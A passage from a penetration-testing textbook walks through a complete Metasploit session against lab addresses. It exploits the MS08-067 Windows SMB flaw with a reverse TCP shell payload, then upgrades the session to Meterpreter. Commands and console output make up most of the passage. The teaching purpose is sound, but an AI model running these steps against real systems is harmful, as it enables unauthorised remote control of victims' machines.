96
Chapter 6
into the network. Let’s look at a quick example from start to finish using
MS08-067 with a reverse command shell as the payload, and upgrade it to a
Meterpreter shell.
root@bt:/opt/framework3/msf3#
msfconsole
msf >
search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack
Corruption
msf >
use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) >
set TARGET 3
target => 3
msf exploit(ms08_067_netapi) >
setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) >
setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) >
exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) >
sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 ->
192.168.33.130:1044)
msf exploit(ms08_067_netapi) >
sessions -i
2
[*] Starting interaction with 2...
meterpreter >
At we issue the
setg
command for
LHOST
and
LPORT
, which is required in
order for the
sessions -u 1
to upgrade to Meterpreter at . (The
setg
command
sets the
LPORT
and
LHOST
globally in Metasploit, not just for this exploit.)